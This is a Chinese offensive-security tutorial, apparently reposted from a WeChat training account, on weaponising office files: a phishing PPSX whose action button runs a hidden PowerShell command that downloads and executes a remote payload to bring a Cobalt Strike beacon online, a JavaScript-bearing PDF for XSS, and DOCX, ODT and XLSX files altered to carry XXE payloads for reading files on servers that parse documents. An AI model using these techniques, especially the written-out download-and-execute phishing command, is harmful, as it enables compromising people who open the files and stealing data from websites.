扫码领资料

获网安教程

免费&进群

来Track安全社区投稿~

千元稿费！还有保底奖励~

1. 简单制作一个用于钓鱼的PPTX文件

一般那种小白不知道PPT也能拿来钓鱼，这里主要是借用PPT中的”动作按钮”,
我们在插入的地方，选择“动作按钮”

然后在弹出的窗口处：

比如填入上线CS的语句：
powershell.exe -nop -w hidden -c "IEX ((new-objectnet.webclient).downloadstring('http://x.x.x.x:80/a'))"
最后我们将ppt格式保存为ppsx格式，打开即可上线

使用PDF进行XSS攻击【这个有点鸡肋，只是一种思路】
一个也不算新的攻击点，它的攻击场景其实说常见也常见说不常见也不常见，如果在日常日站中能遇到一些站的文件上传允许上传PDF，能在线解析上传的PDF，用户可以在线浏览PDF文件的，那么久可能存在XSS攻击漏洞，废话不多说，我们来制作一个恶意PDF文件，方法如下：
找一个PDF编辑器，我这边用的是迅捷，其他的编辑器应该是差不多，点击左上角选择新建空白页

单机左侧的“页面“标签，选择与之对应的页面缩略图，然后从选项下拉菜单中选择“页面属性”命令

也可以在这个位置找到

在“页面属性”对话框单击“动作”标签，再从“选择动作”下拉菜单中选择“运行 JavaScript”命令，然后单击【添加】按钮，弹出 JavaScript 编辑器对话框

在弹出的“JavaScript 编辑器”对话框中输入代码：
app.alert(‘XSS’);

我们保存后，用浏览器打开这个pdf文件[]

1、DOCX文档的构造
使用docx文档进行xxe攻击，一般小白听都没听过，就感觉很高级的赶脚，其实ta的原理非常简单，打过CTF比赛的小伙伴们应该都知道docx本质上是压缩包，是把一堆xml文件按照一定格式压缩在一起

下图可以清晰的看到DOCX文档的实际构成

既然是xml文件，我们知道xxe攻击的本质上就是后端在处理XML相关数据的时候也执行了我们的恶意XML语句，那么我们可以把恶意语句嵌入到DOCX文档中的某些xml文件中，想办法让网站触发
这个方法的关键点在于，要去寻找那种网站本身可以阅读DOCX文档或者在线解析DOCX文档的功能，一定绕不开解析DOCX文档里的XML文件，所以那种网盘在线阅读DOCX文档、网站在线解析DOCX文档、邮件系统传输DOCX文档等等功能都有可能存在这类漏洞，下面讲讲利用姿势

• 第一个回显位置
  这个位置在word/document.xml文件中
  把它打开后发现是这样的

第一个位点在文档声明的下方，也就是这个位置

可以嵌入恶意代码，比如：

然后将这个压缩包的后缀改为DOCX，就获得了一个用于xxe攻击的DOCX文档

• 第二个回显位置
  这个功能点所处的位置是docProps/app.xml

可以清楚的看到控制页码的标签是

在Pages标签中嵌入XXE攻击语句即可

然后和上面一样将这个压缩包的后缀名修改为DOCX，就得到了一个用于xxe攻击的DOCX文档
2、利用Word OLE功能进行XXE攻击
这个手法主要用于攻击Libreoffice，Libreoffice是很多Word转PDF网站的常客，实战情况下有机会遇到
先创建一个OLE对象

选择由文件创建

这个文件名的绝对路径可以自己填，插入好之后将这个文档先保存为.odt格式

然后老样子，把它后缀改为.zip格式再修改其中的XML文件，在content.xml中找到第一个xlink:href 其中的路径修改为你想要读的文件

最后把它重新改成Docx格式即可

使用Excel文档进行XXE攻击的原理基本与Word文档进行攻击的原理一致，Excel文档也是由XML文件按照一定的格式压缩在一起的。它们的输出位点也非常相似，把xlxs文档后缀改为zip，找到xl/workbook.xml文件。

同样在XML声明行的下面有一个输出位点

填入恶意语句
将压缩包后缀重新改回xlxs文件即可得到一个恶意Excel文件

原文始发于微信公众号（掌控安全EDU）：实战攻防中关于文档的妙用